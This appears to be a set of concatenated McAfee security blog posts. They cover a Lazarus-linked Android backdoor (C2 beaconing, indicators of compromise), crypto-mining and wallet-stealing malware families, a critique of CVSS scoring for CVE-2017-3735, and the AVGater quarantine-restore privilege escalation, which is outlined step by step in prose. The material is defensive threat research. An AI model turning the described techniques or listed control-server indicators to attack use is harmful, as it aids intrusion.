The McAfee Mobile Research team recently examined a new threat, Android malware that contains a backdoor file in the executable and linkable format (ELF). The ELF file is similar to several executables that have been reported to belong to the Lazarus cybercrime group. (For more on Lazarus, read this post from our Advanced Threat Research Team.)

The malware poses as a legitimate APK, available from Google Play, for reading the Bible in Korean. The legit app has been installed more than 1,300 times. The malware has never appeared on Google Play, and we do not know how the repackaged APK is spread in the wild.

Figure 1: Description of the legitimate app on Google Play.

Figure 2: An overview of the malware’s operation.

Comparing Certificates

The repackaged APK has been signed by a different certificate from the legitimate APK. We can see the differences in the following two screen captures:

Figure 3: The certificate of the malicious, repackaged APK.

Figure 4: The certificate of the legitimate APK.

Once the malicious APK installs its code, it attempts to execute the backdoor ELF from “assets/while.” If the ELF successfully executes, it turns the device into a bot.

Figure 5. The main function for executing the backdoor ELF.

Analyzing the Backdoor

Once the backdoor ELF starts, it turns into a zombie process to protect itself. It remains as a zombie even if the parent process terminates, as long as the “dex” execute() method has been implemented successfully.

Figure 6. The malware turns itself into a zombie process.

The malware contains a list of IP addresses of control servers. The list is encoded and written to the file /data/system/dnscd.db.

The preceding table lists information for each of the IP addresses. None of these is available now.

Figure 7. The flow of writing the encoded control server IPs to a file.

The IP address array is encoded by a simple routine when it is loaded into memory from the read-only data section; that encoded data is written to the file /data/system/dnscd.db. The decoded file is then loaded into memory to select an IP address to connect to.

One of control servers is selected randomly immediately before the backdoor process attempts to connect to its address. The attempt is performed repeatedly to successfully connect with one of the control servers.

Figure 8. The malware creates a socket and connects to a randomly selected control server.

Once connected with a control server, the malware begins to fill the buffer using a callback beacon. Figure 9 shows a part of the message-generating code. Several fields of the packet are hardcoded, particularly the bytes at offsets 0, 4, and 5. After we realized that the message only pretended to use the SSL handshake protocol, we understood the meaning of the hardcoded bytes. The byte at offset 0 is the handshake type; offsets 4 and 5 are the SSL version of the handshake layer, a part of transport layer security.

Figure 9. A part of the function for generating a callback beacon.

Figure 10. Transferring data to be used as the callback beacon to the control server.

After the message is generated, it sends the following packet (Figure 11) to the control server as a callback beacon. There is a randomly selected well-known domain in the packet where the server name indicator field is placed as a field of extension data. We suspect this is an evasion technique to avoid detection by security solutions looking for suspicious behaviors.

Figure 11. A captured packet from the callback beacon.

Figure 12. The list of legitimate (well-known) domains in the binary.

After sending the callback beacon, the malware assigns global variables that contain device information which is transferred to the control server once it receives the command code 0x5249. Figure 13 shows the jump table for implementing commands and its pseudo code.

Figure 13. The jump table for implementing commands from the control server and the structure for receiving data.

The functions are described in the following table. Command code and arguments arrive as structured data from the control server, as shown in Figure 13. The command code and arguments are assigned, respectively, to the CMD and DATA member variables of the received data structure.

After performing commands received from the control server, the malware returns the results to the control server using the codes in Figures 14 and 15. Before transferring the results, the return code and data are stored in a structure described in the following pseudo code.

Figures 14 and 15. The codes and data structure returned to the control server.

Similarities to Lazarus Malware

In Figure 16, the function on the left is from the backdoor ELF we have analyzed. On the right, we see procedures found in several executables used by the Lazarus Group in various attacks.

Figure 16. Similar functions to the executable used in the Sony Pictures attack.

Both functions look very similar. And the hexadecimal seeds for generating a key for encryption and decryption are the same. Both functions are also used to generate a message encryption and decryption key between the victim and control server. Figure 17 shows the functions of both the backdoor ELF and an executable recently used by the Lazarus Group. The function connects to the control server, and generates a disguised SSL ClientHello packet. Then the generated packet is sent to the control server as callback beacon.

Figure 17. The functions to establish a connection to the control server (ELF on the left).

The function in Figure 18 generates a disguised ClientHello packet to use as a callback beacon.

Figure 18. Generating the disguised ClientHello packet (ELF on the left).

Both backdoors use same protocol, as we confirmed when analyzing the function for receiving a message from the control server. Figure 19 shows the protocol for transferring a message between the backdoor and the control server.

Figure 19. The receive message function included in the checking protocol (ELF on the left).

To transfer a message from the source, the malware first sends a five-byte message to the destination. The message contains information on the size of the next packet, a hardcoded value, and the type of message. The hardcoded value is 0x0301 and the type of message can be between 0x14–0x17. The message type can also be used to check the validation of the received packet. The following is pseudo code from the receive function:

Figure 20. The five-byte packet sent before the source sends its primary message.

Figure 21. Pseudo code from the receive message function.

Conclusion

The security industry keeps an eye on the Lazarus Group, and McAfee Mobile Security researchers actively monitor for mobile threats by Lazarus and other actors. We compared our findings with the threat intelligence research of our Advanced Threat Research team, which studies several groups and their techniques. Due to the reuse of recent campaign infrastructure, code similarities, and functions such as the fake transport layer security, these tactics match many we have observed from the Lazarus Group.

We do not know if this is Lazarus’ first activity on a mobile platform. But based on the code similarities we can say it with high confidence that the Lazarus Group is now operating in the mobile world.

McAfee Mobile Security detects this malware as “Android/Backdoor.” Always keep your mobile security application updated to the latest version. And never install applications from unverified sources. This habit will reduce the risk of infection by malware.

Indicators of Compromise:

Hashes

12cc14bbc421275c3c6145bfa186dff

24f61120946ddac5e1d15cd64c48b7e6

8b98bdf2c6a299e1fed217889af54845

9ce9a0b3876aacbf0e8023c97fd0a21d

Domains

mail[.]wavenet.com.ar

vmware-probe[.]zol.co.zw

wtps[.]org

IP addresses

110[.]45.145.103

114[.]215.130.173

119[.]29.11.203

124[.]248.228.30

139[.]196.55.146

14[.]139.200.107

175[.]100.189.174

181[.]119.19.100

197[.]211.212.31

199[.]180.148.134

217[.]117.4.110

61[.]106.2.96

The post Android Malware Appears Linked to Lazarus Cybercrime Group appeared first on McAfee Blogs.

When it comes to describing cyberattacks, the word sophisticated is used a lot. Whether to explain yet another “advanced” campaign by a threat actor group hoping to steal information or disrupt computer systems, it seems the precursor to any analysis is to call it sophisticated. Yet the modus operandi for many of these groups is to begin an attack with a simple email, which for some time has been one of the most effective malware delivery mechanisms.

The McAfee Mobile Research team has identified a new threat—Android malware that poses as a legitimate app available from Google Play and targets South Korean users—that suggests a deviation from the traditional playbook. An analysis of campaign code, infrastructure, and tactics and procedures suggests the Lazarus group is responsible, as they evolve their attack tactics to now operate within the mobile platform. And although the debate regarding attribution of attacks will always rage, documenting evolving tactics by threat actor groups allows organizations and consumers to adapt their defenses accordingly.

Based on what we know, the app first appeared in the wild in March 2017. The distribution is very low and is aimed at a Korean Audience (based on telemetry hits).

Although we cannot be certain, persons associated with GodPeople, an organization based in Seoul with a history of supporting religious groups in North Korea and the developers of the original application, could be the intended targets. GodPeople is sympathetic to individuals from North Korea, helping to produce a movie about underground church groups in the North. Previous dealings with the Korean Information Security Agency on discoveries in the Korean peninsula have shown that religious groups are often the target of such activities in Korea.

Evolving Attack Tactics

Leveraging email as the entry vector allows attackers to be very specific about whom they wish to target, often described as the spear phishing. Developing a malicious application does not provide the same level of granularity. However, in this instance the attackers developed malware that poses as a legitimate APK, advertising itself as means for reading the Bible in Korean. Leveraging the mobile platform as the attack vector is potentially significant—particularly as South Korea has a significant mobile population that is “in a race to be first with 5G,” according to a Forbes article. Typically when a mobile platform is mentioned, we think about our mobile phones. However, in this case, we know South Korea has an increasing use of tablets, replacing traditional laptops. How well secured are tablets and how are they monitored?

Evolving attacks onto the mobile platform are likely to continue, and this appears to be the first example of the Lazarus group using mobile. Such a change, therefore, is significant, demonstrating that criminals are keeping up with platform popularity. Indeed, according to the International Telecommunication Union, the global number of mobile subscriptions worldwide now exceeds the global population, which suggests that such a tactic is only likely to increase as our dependency on mobile platforms grows.

Source: International Telecommunication Union.

Keeping Safe

Understanding the evolving tactics by nefarious actors is imperative. It is critical that we adopt simple security measures to counter these new tactics. This malware is detected as “Android/Backdoor” by McAfee Mobile Security. Always keep your mobile security application updated to the latest version. And never install applications from unverified sources.

The post Lazarus Cybercrime Group Moves to Mobile Platform appeared first on McAfee Blogs.

How’s your Bitcoin balance? Interested in earning more? The value of cybercurrency is going up. One way to increase your holdings is by “mining,” which is legal as long as it is done with the proper permissions. Using your own mining equipment or establishing a formal agreement for outsourcing are two methods. Hardware vendors such as Asus manufacture motherboards that are specifically tailored for mining cryptocurrency.

Bitcoin mining involves complex mathematical calculations that are carried out by a computer’s hardware and result in transaction records. These records are added to the Bitcoin public ledger, the “blockchain.” The ledger keeps track of all transactions and verifies these transactions are legitimate.

Cybercriminals are also attracted to online currency, which fuels much of their business, including malware purchases and ransomware payments. Cybercriminals would rather find outside computing power instead of using their own equipment because the price of a dedicated mining machine could exceed US$5,000. Cybercriminals often seek to bypass the agreement phase and maliciously introduce malware that will either use a victim’s computing power to mine for coins or simply locate and steal the user’s cryptocurrency.

Three popular Bitcoin miners.

The number of instances of mining malware has increased significantly, to 1.65 million victims this year, according to one report. That’s a lot of slowing machines and increased electricity costs. For individual users, the slowness and increased electricity bill may be trivial, and go unnoticed for a time. For businesses with hundreds or thousands of machines, however, the cost increase can be substantial.

The increased interest in illegally mining or stealing cryptocurrencies correlates easily with the increased value of these currencies. One Bitcoin (BTC) was recently worth more than $7,500, up from around $3,000 a few weeks ago. Even considering an earlier decline in value, Bitcoin has been trending upward for years. This upswing in value and the recent adoption of Bitcoin in Japan and South Korea as a legal tender have increased the demand for acquiring Bitcoin and altcoins. In September cybercriminals stole $63,000 worth of cryptocurrency in about three months by taking advantage of a flaw in Microsoft Windows Internet Information Services.

The price of Bitcoin since 2010. Source: CoinDesk.

Initial coin offerings (ICOs) have also contributed to this gold rush. ICOs are similar to IPOs but instead of issuing to investors shares of a new company, the investors are given cryptocurrency in the hopes a new company will be successful and result in a higher value for their digital coins.

During the last few years we have seen an increase in innovation by malware authors to infiltrate this space, resulting in malware that both mines or steals coins and spans various and platforms. Let’s break down some of the tools and techniques in the world of crypto-mining/-stealing malware that has arisen.

• NightMiner
• Adylkuzz
• EternalMiner
• MulDrop.14
• ELF Linux/Mirai
• OSX/Miner-D
• Dridex
• Trickbot
• Jimmy Nukebot
• HawkEye
• Cerber
• Web Mining

NightMiner

NightMiner mining malware was first seen in the wild in March 2015 and has been used to mine the Monero cryptocurrency. Some cybercriminals have turned to Monero due to its built-in security features and lower cost to mine. For example, Monero by default supports many blockchain obfuscation and anonymity technologies such as stealth addresses and crypto notes. This malicious software has been discovered on network attached storage (NAS) devices and takes advantage of those devices’ powerful CPU and GPU resources. The mining software can stay under the radar on these devices because most administrators fail to install antimalware software on NAS systems. Sophos released an extensive report discussing this malware.

Adylkuzz

Adylkuzz is more recent, coming on the scene in this year. The mining malware is similar to the well-known ransomware WannaCry in that it exploits two flaws in Microsoft’s server message block (SMB) that are known as EternalBlue and DoublePulsar. Both defects were leaked by the Shadow Brokers hacking group and are believed to be the work of the U.S. National Security Agency’s Equation Group. Adylkuzz is unique in that it will block all access to TCP Port 445, preventing other malware from taking advantage of the SMB flaws.

Code snippet from the EternalBlue Metasploit module.

EternalMiner

Linux systems are not immune. EternalMiner took advantage of a vulnerability in Samba to infect as many systems as possible. The flaw allowed Samba servers to load and execute code remotely after a shared library was uploaded by a malicious client. A patch to address the seven-year-old flaw was released in May, but cybercriminals made thousands of dollars before network administrators could update their servers.

Linux.MulDrop.14

Researchers have seen instances of Raspberry Pi—a small, versatile single-board computer— attacked by the crypto mining malware Linux.MulDrop.14. The malicious software does not attempt to mine the CPU-intensive Bitcoin but, like NightMiner, focuses on Monero. This action shows a level of innovation as cybercriminals expand their scope to acquire cryptocurrencies across additional platforms.

ELF Linux/Mirai

Cryptocurrency malware mining has been discovered in connection with the Mirai botnet. ELF Linux/Mirai continues to evolve and has added a Bitcoin miner slave module, allowing the malware to mine cryptocurrency from thousands of infected IoT devices, according to a report from IBM X-Force. Mirai, discovered in August 2016, infected IoT devices and has also been responsible for several DDoS attacks, including against DNS provider Dyn and Liberia’s Internet infrastructure.

Source: McAfee Labs Threats Report, March 2017

OSX/Miner-D

Although Apple’s Mac OS has not been heavily targeted, it is also not immune. OSX/Miner-D both steals Bitcoins and mines a system. This malware has been around since 2011 and is the second most common malware on the Mac. The malware, which is inserted into legitimate apps uploaded to torrent sites, made a surge early this year and resulted in more than 20% of all detections in May. We expect to soon see new variants of this malicious software.

Dridex

Cryptocurrency mining has caught the attention of the Dridex Trojan’s developers. Dridex is a banking Trojan that steals credentials to access accounts. Samples of this malware were discovered in 2016 that find and steal cryptocurrency wallets.

Dridex is sophisticated malware. The developers behind this malware continue to evolve its code to avoid detection, increase infections, distribute ransomware, steal banking and personal information, and now pilfer Bitcoins.

Trickbot

The cybercriminals behind Trickbot have added the capability to steal cryptocurrency. Trickbot has been around for years and has recently added coinbase.com as one of its attack vectors. Once a system is infected, the malware monitors the victim’s browsing habits and injects a fake login page whenever the user visits coinbase.com. The fake page allows criminals to steal the login information, resulting in the theft cryptocurrencies including Bitcoin, Ethereum, and Litecoin as well as other digital assets. 

Jimmy Nukebot

Another Trojan making headlines is Jimmy Nukebot. The authors behind the malicious software used code from the NeutrinoPOS banker Trojan. This variant, detected by McAfee as RDN/PWS-Banker, does not steal bank card data as before but installs various modules that contain a payload. One payload mines Monero. The digital wallet associated with the miner has received only about $45, which may indicate the malware authors either changed wallets or have stopped mining, according to Kaspersky.

McAfee Labs detections for some variants of mining malware. Peek detections are the highest number of detection occurrences on a single date in 2017.

HawkEye

The credential harvesting malware HawkEye, which surfaced in 2014, has added Bitcoin wallet stealing to its arsenal. The malware is well known for stealing a variety of credentials from web browsers and mail clients. Recent samples show HawkEye targeting the file wallet.dat, which holds the user’s Bitcoin private keys along with other transaction information.

Cerber

Developers behind most ransomware prefer the ransoms be paid using cryptocurrency. In the recent case of Cerber, however, the actors have resorted to stealing the coins from the wallet before encrypting the system. Cerber is one of the most prolific ransomware families, infecting millions of computers worldwide. The ransomware has seen a decline in the past few months but continues to wreak havoc.

The number of Cerber samples detected during the last 90 days. Source: Ransomware Tracker.

Web Mining

One new trend is a technique that mines cryptocurrency when visitors connect to websites. Coinhive and Crypto-Loot, as well as others, sell Monero mining software that allows the buyer to insert JavaScript into websites. The JavaScript mines cryptocurrency by using the site visitor’s CPU power. The service has been a hot topic since it first appeared because the software can be used maliciously to allow cybercriminals to mine cryptocurrency without users consent. A few legitimate sites, including The Pirate Bay and a major television company, have recently been found using the software to mine Monero. The entertainment conglomerate has removed the code but it remains unclear whether hackers injected the software or if the company included the code to make a few extra dollars while unsuspecting users were watching their favorite shows.

The Pirate Bay has also removed the mining code and released a statement claiming the 24-hour test was designed to see if the popular file-sharing site could use the miner to generate revenue and potentially replace ads. A few other sites, including Iridium and PublicHD, are using the JavaScript code openly: Both sites inform their users of the code and in the case of Iridium allow them to opt out. The unsuspected use of web miners has caused some websites to go dark. Internet provider Cloudflare began shutting down domains after the company discovered Coinhive’s software mining Monero from visitors to torrent site ProxyBunker. The domains, which were shuttered for not allowing users to opt out, were reopened after removing the mining code.

JavaScript code from Iridium’s Google Chrome miner extension.

Crypto mining is not new, but it has gained attention due to the popularity of cryptocurrency, ICOs, and the overall value increase of alt coins. As the adoption rate for cryptocurrency grows, we can expect cybercriminals to increasingly illegally mine or steal cryptocurrency. They can exploit online funds to shop on the dark web or in exchange for real currency.

A timeline of leading cryptocurrency miners.

The post Malware Mines, Steals Cryptocurrencies From Victims appeared first on McAfee Blogs.

I am a wry observer of vulnerability announcements. CVE-2017-3735—which can allow a small buffer overread in an X.509 certificate—presents an excellent example of the limitations of the Common Vulnerability Scoring System (CVSS). This scoring system is the de facto security industry standard for calculating and exchanging information about the severity of vulnerabilities. The problem is that CVSS is used for far more than it was intended.

For many organizations, security tools, and risk assessments, a CVSS score has become the security industry’s shorthand substitute for risk scoring and impact rating. In fact, many organizations measure their ongoing risk posture by counting the number of unfixed vulnerabilities and their associated CVSS scores.

The McAfee Product Security Incident Response Team (PSIRT) uses CVSS Version 3.0 as an important tool to assess vulnerabilities. McAfee PSIRT augments CVSS with other risk analysis techniques, similar to Microsoft PSIRT’s Exploitability Index and Security Update Severity Rating System.

CVSS is useful, but must not be confused with deeper risk assessment. Strictly relying on CVSS for vulnerabilities such as OpenSSL’s CVE-2017-3735 is likely to cause incident responders to focus their organizations’ resources on patch cycles that may be unnecessary. In addition, PSIRT credibility and influence may be squandered on low-impact, low-probability issues. Due to the sheer volume of issues being discovered and reported, PSIRT must remain focused on those that have a high probability of exploitation and whose organizational impact or attacker value make them worthy of exploitation.

But as we shall see from the following analysis, a vulnerability itself, taken out of context, cannot be equated to risk. Furthermore, CVSS has an inherent problem in that the impact is averaged against the exploitability: From the attacker’s perspective, this is a mistake, because threat actors exploit vulnerabilities to suit their goals, not just because something is easy.

For those readers whose sole interest is assessing OpenSSL CVE-2017-3735, this issue, I believe, should be rated as a low to very low risk. Although easy to perform, exploitation does not offer an attacker much of value. The most likely impact will be cosmetic within a text display. Plus, the code in which CVE-2017-3735 occurs is not called from OpenSSL’s protocol and cryptographic functions,[1] but is rather confined to the display of an X.509 certificate, typically for users consumption. (Certificate display does not take place as a part of typical cryptographic functions.)

Taking either of the competing published CVSS scores for this vulnerability, 5 or 7.5, at face value is misleading. Without further analysis, one might be tempted to raise the risk from CVE-2017-3735 beyond its rather minor impact. That is why I decided to investigate further, including reading the offending module’s code on GitHub. The CVSS measure of CVE-2017-3735 provides a situation where accurate scoring does not match the likelihood of exploitation and increases the score above what a risk analysis would probably reach.

Although it is true that attackers must choose exploits that lie within their technological capabilities—namely, exploits that are easy enough to ensure success—the first concern will nearly always be, “What will the exercise of this vulnerability achieve for me?”

In other words, what matters is the impact or result from the exploitation that is key to choosing a particular attack, not its relative ease or difficulty. If a vulnerability advances the attacker’s goals, then it will be considered for use. If there is nothing to gain, the vulnerability will not be exploited.

Limits to CVSS

Attackers exploit vulnerabilities that further their goals: That is a key point when assessing the potential for harm of any vulnerability. In this analysis, we will take a closer look at CVE-2017-3735 for its potential value to attackers. Along the way, we will also examine some of the limitations of CVSS as it applies to this vulnerability.

I do not mean to assert that CVSS is not an important tool for assessing vulnerabilities. I have worked with CVSS since before Version 1 was published; CVSS is key to prioritizing initial responses to vulnerabilities as they are released. CVSS may comprise one component of a robust risk rating method or approach.

I like to characterize CVSS as “potential severity.” A CVSS score, when fairly calculated,[2] can indicate what any vulnerability might harm. CVSS scores are particularly useful for triage, before a deeper analysis.

The McAfee PSIRT makes use of CVSS as a core component of incident response, just as many organizations PSIRTs do. As a CVE Numbering Authority, McAfee PSIRT must calculate a CVSS score for every published vulnerability. In practice, nearly every potential issue is scored as a critical foundation of PSIRT’s robust risk assessment.

Still, despite the importance of CVSS to vulnerability triage, it is a mistake to confuse a CVSS score with a risk rating, as we shall see.

CVE-2017-3735 has had two competing CVSS scores published.[3] The difference is in the rating of the impact: Integrity = High or Integrity = Low, resulting in a combined score of either 7.5 or 5.3 (in CVSS Version 3.0). In either case, both scores earn the exploitability rating of 10, because the issue may be exploited over a network without authentication.

CVSS = 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

(From: https://nvd.nist.gov/vuln/detail/CVE-2017-3735)

CVSS = 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

(From: https://nvd.nist.gov/vuln/detail/CVE-2017-3735)

How can there be two CVSS calculations? Why is one calculation High and one Low? Plus, is Integrity the correct impact parameter?

We can answer these questions by analyzing what the vulnerability allows.

The vulnerability is a buffer overread. An attacker may read one more byte from program memory than should be allowed. The attacker’s advantage of the unallowed access is directly related to where that extra byte exists. After looking at the code on GitHub, it appears all buffers in that module are allocated from program heap memory. Although running programs can exhibit macro patterns in their heap allocations and deallocations, generally, we can assume that any allocation may reside wherever it is convenient for the program memory manager to grab a piece of memory sufficiently large to support the request. This introduces an element of entropy (randomness) into any particular allocation. Each allocation may come from any portion of heap memory; there is no guarantee of a particular address.

Because a particular address cannot be guaranteed, an overread will get whatever bytes happen to be larger than that allocation’s required size.

Whichever data happen to be at that address is what the overread vulnerability will retrieve. Buffer overread exploitation can be a fishing expedition; there are no guarantees of the data retrieved, though there may be macro patterns in programs in which runtime processing is relatively consistent from run to run. The data returned depends on how lucky the attacker is. We saw the same situation in the Heartbleed overread vulnerability.

Just One Byte

For CVE-2017-3735, the overread is precisely a single byte. That is a very small payoff for the attacker, especially considering that there is no guarantee of what that byte might contain.

Furthermore, even if this were not an overread but rather an overflow (which it is not), a single byte is not enough space for malicious code to allow an attacker to exit to a command shell. A buffer overread does not allow an attacker to push code into a program heap. It allows an attacker only to retrieve data (a single byte) that the attacker should not have reached.

Although we may be surprised some day by a clever attacker’s ingenious use of a single byte, today we see no way that anyone can benefit.

If CVE-2017-3735 allows an attacker to retrieve only a single byte, then why have CVSS scorers used the Integrity impact rather than Confidentiality? Heartbleed, a heap buffer overread that returned nearly 64KB to the attacker, impacted Confidentiality. Attackers retrieved data they should not have been able to access. Yet CVE-2017-3735 has been scored on Integrity. There is a clue alongside the description.

Because I do not have access to the graph of code calls to the vulnerable IPAddressFamily routines, I cannot confirm the following educated guess. However, typical cryptographic and protocol implementations do not dump certificates to text; primarily users do. Which indicates that an attacker does not retrieve the extra byte. Instead, the extra byte is converted to text in the IPAddressFamily certificate extension’s human-readable dump. Thus the integrity of the text representation of an X.509 certificate has been impacted. With this understanding of the impact, scorers have used Integrity rather than Confidentiality.

If the attacker retrieves the text dump, is there a way to track back from various text irregularities to the value of the extra byte? I have not looked at a range of dumps to confirm or deny. Perhaps this is either not possible or not a productive approach.

If there is any way to retrieve the data byte, then the proper CVSS score would have to be Confidentiality = Low rather than None, which would increase the CVSS score to either 6.5 or 8.2, depending upon Integrity’s value, Low or High.

A CVSS score of even 5.3 gives a luster of importance to CVE-2017-3735 that it does not deserve. Any of the potentially higher scores suggest the wrong direction, which is probably why scorers refrained from including the potential for a confidentiality impact. Still, we should analyze this score to understand the strengths and limitations of CVSS. If scored for all impacts and the ease of exploitation at 6.5, CVSS indicates that this is an important vulnerability that should be addressed in a timely manner. Yet if my analysis is correct, CVE-2017-3735 should not move to the top or even middle of anyone’s work queue. Patch it in due time, through scheduled update cycles. Nothing more.

The potential impact from CVE-2017-3735 is probably not significant in the vast majority of OpenSSL’s use cases. Integrity = Low, maybe Confidentiality = Low, too. Attacker utility = None.

In fact, the most often published description for CVE=2017-3735 indicates the trivial nature of any impact: “The most likely result would be an erroneous display of the certificate in text format.” (See References.[4])

After reading this analysis, I hope it is clear that CVSS fails to account for the complete situation with respect to CVE-2017-3735.

Unequal Weights

As we mentioned, the exploitability and impact scores are each weighted equally (actually, averaged). From the attacker’s view, this is inaccurate.

Attackers do not equally exploit every vulnerability. More important, attackers do not choose to exploit a vulnerability simply because it is easy to exploit. They have no time for that; attackers are trying to achieve their goals, whatever those may be. Anyone prioritizing vulnerability responses needs to keep this in mind as we analyze.

The following published description for CVE-2017-3735 is, at the very least, misleading and erroneous, considering the single-byte heap buffer overread affects only a user-initiated text dump:

“Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.”

There are no “security restrictions” involved in a certificate transformed to text. Further, a single byte is insufficient to enable “launching further attacks” even if the issue were more than an overread: The attacker cannot gain control of program memory through this flaw.

Quite often, organizations have hundreds or thousands of vulnerabilities to examine. To which should they respond first? Which response should get the most resources? Which of the perhaps dozens of vulnerabilities announced in any week or month can be allowed to remain open in the face of limited resources?

These are fundamental questions that every organization must answer, probably every day. One way to prioritize is to begin assessing the potential impact to the organization and the potential utility to the attacker. These two dimensions are more important than how easy or difficult a vulnerability is to exploit, although that also important information once we determine that a vulnerability is significant.

Calculating CVSS helps practitioners identify those items that warrant deeper analysis. Unfortunately, due to the way that a CVSS base score is averaged across the exploitability and the impact dimensions, CVSS in some instances fails to sufficiently assess risk, especially in cases where utility to an attacker appears to be relatively insignificant.

The McAfee PSIRT uses CVSS as a critical tool for triaging vulnerabilities and for gauging response times. Still, CVSS is no substitute for a deeper risk analysis when it is warranted.

Notes

[1] We did not have access for this analysis to an OpenSSL code graph, which would have allowed a definitive examination of calls to the vulnerable code. However, it appears from a cursory examination that the module is primarily called upon user instigation, from command-line tools, not during protocol processing.

[2] There are numerous cases of scores being inflated or deflated to fit the agenda of the scorer. How can cross-site scripting scores range from 1.8 to 9? That seems impossible, but a simple search will return that range of scores from Mitre’s CVE data.

[3] Vendors may calculate alternate scores for their products, which will be dependent upon particular vendor circumstances.

[4] One published description seems to vary considerably. The following does not seem to match our reading of the code or the behavior of a single-byte heap buffer overread:

“Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.”

The post Don’t Substitute CVSS for Risk: Scoring System Inflates Importance of CVE-2017-3735 appeared first on McAfee Blogs.

On November 10, a researcher reported the vulnerability AVGater, which affects some antimalware products. The vulnerability allows a user without administrative privileges to restore a quarantined file in a user’s defined location.

After internal reviews and with confirmation from the author of the blog, McAfee believes no McAfee products are affected by the privilege escalation vulnerability described in the AVGater blog.

The mechanism that allows users to restore files from quarantine in McAfee products is either locked by default or is available only to users with administrative privileges, providing an additional layer of protection to our customers.

AVGater, as described by blog author Florian Bogner, is based upon antimalware products use of a permanent storage area (folder or directory) to contain software that the antimalware program has “convicted”—executables believed to be malicious. Once convicted, the malicious software must be placed somewhere where it cannot execute and cause (further) harm.

Why not just immediately delete convicted software? If files were summarily deleted, there would always be a chance the files had been incorrectly convicted and might be important to the user. Unfortunately, no software can be considered perfect.[i] False detections occasionally occur, even with the most comprehensive and accurate software. Placing files into “quarantine,” the reserved safe area, mitigates the potential for an accidental removal of users’ important files.

Because of the potential of false-positive malware conviction, nearly every endpoint protection program makes use of a “quarantine” location, where assessed bad files are placed before deletion, just in case there has been a mistake in the identification algorithms.

Researcher Bogner has uncovered a way that quarantined software can be restored to execute, potentially with a privilege escalation from user-level privileges to the Windows system user. He has named the technique AVGater.

Privilege escalation is a critical step in the path to the full compromise of an operating system. Although a user may not have permission to write executable software into directories reserved for the operating system, if an attacker can execute malware from one of Windows’ system directories, an attacker can begin to subvert or replace critical system software with malware. Full control of the operating system may be within reach by just a few, perhaps undetected, steps.

Privilege escalation to the level of the Windows’ system user is not an attacker’s ultimate exploit, but it is a significant step that provides attackers assistance toward their goals.

We live in a world in which techniques to get users to take a single step (click, save, open, view, read) is commonplace; there are thousands of spoofs, scams, confidence games, and social engineering techniques. If you live in the digital world, you have been exposed to many of these, maybe every day.

It is not hard to imagine that attackers, having gotten their software placed into AV quarantine, can execute subsequent software, perhaps through tricking users in some manner.

AVGater is not a straightforward attack. Successful quarantine removal and copying to a system directory must be proceeded by other steps for attackers to achieve their goals, whether controlling additional hosts for a botnet, gathering account information, or other ends. (See the section “AVGater technique,” below, for more information.)

Getting malware onto a Windows machine is relatively uncomplicated; it happens thousands of times every day. Tricking users to proceed is also well understood by attackers with varying levels of technical skill. Thus we believe that attacks based upon AVGater are credible, if not particularly straightforward.

AVGater has not yet been widely used by attackers. Nonetheless, it should be easy for a malware writer to drop detection defenses to force a conviction and quarantine of an attack. This step makes this attack noteworthy: Malware writers already know how to be identified by antimalware programs.

All of AVGater’s steps seem well within reasonable capabilities of competent attackers. Users whose security software is vulnerable should update to a patched version as soon as possible.

It is a poor idea to conduct day-to-day operations from the Windows administrator account. McAfee recommends that users start with a less privileged, user-level account and elevate to administrative privileges only for necessary operations and only for as long as needed to complete a task. Consumers should set up a nonadministrator account as the usual login.

McAfee® ePolicy Orchestrator® (McAfee ePO) administrators should use the product’s capabilities to reduce the privileges that users need for common tasks, and thus reduce the privilege levels required by most users.

Always running with administrative privileges is a dangerous practice. One mistake can allow a complete compromise. Attackers do not need to go through the steps of AVGater or other privilege escalation. If attackers can execute some code as administrators, they can probably compromise Windows completely. AVGater does not lend attackers any additional advantage.

Users who recognize social engineering attacks will have an advantage in protecting themselves, because they are much less likely to accept suspicious software and fall for tricks that execute the secondary steps required in this attack.

As always, all users are advised to avoid public hotspots. If you must use one, be sure to make use of your company’s VPN services as soon as you join, or use some other VPN technology to conduct your online activities. Always disable unneeded services; do not leave file sharing on except for highly trusted networks; do not blindly accept files from untrusted sources, especially on unsecured and untrusted networks. We should always follow these safe computing practices irrespective of the latest attack technique or the state of our computing protections.

McAfee continues to investigate potential attack vectors related to AVGater. As of this writing, both McAfee and Florian Bogner have found no unmitigated paths through a McAfee product. If we discover additional information, we will update this post.

AVGater Technique

To promulgate this attack, the security software must identify an attacker-controlled program as malware, which will result in quarantine. The attacker must next switch the quarantined file for malware that will further the attack. Then the attacker must set up the necessary Windows file “junction” so that removing the file from quarantine also copies it into a directory with Windows system privileges.

Any number of tricks can convince at least some users into executing additional malicious software that removes the attack software from quarantine and, through the previously set-up file junction, places the software into a privileged directory. The attacker then must somehow execute the attack software from the joined system directory to proceed.

Attackers have developed numerous methods for avoiding or fooling attempts at conviction, while antimalware makers spend a significant proportion of their efforts identifying the attackers tricks so that malware will be accurately identified.

For malware writers to use this technique, they need obvious malware that will ensure conviction. Accompanying the “red herring” malware must be additional software that can hide its true intent (replace the quarantined item, set up file junction, induce the copying to system privileges, and execute the attacker’s code).

Compared with executing one or two steps against users who are running with administrative privileges, AVGater requires more steps, each of which must be executed successfully and in proper order. AVGater demands greater skill to include careful interactions between at least three steps, and at least one user-induced action. This scenario is credible, though more involved than other easy, repeatable attacks.

[i] Software can be proven to be incorrect, but it is difficult to prove it absolutely error free. Readers may wish to investigate Alan Turing’s “Turing’s Proof,” whose math is believed to prove that an automated process cannot prove that an automated process is correct.

The post Should I Worry About AVGater, Which Exploits Some Security Products? appeared first on McAfee Blogs.

This report was written by members of McAfee Labs and the Office of the CTO.

Welcome to the McAfee Labs 2018 Threats Predictions Report. We find ourselves in a highly volatile stage of cybersecurity, with new devices, new risks, and new threats appearing every day. In this edition, we have polled thought leaders from McAfee Labs and the Office of the CTO. They offer their views on a wide range of threats, including machine learning, ransomware, serverless apps, and privacy issues.

The Adversarial Machine Learning Arms Race Revs Up
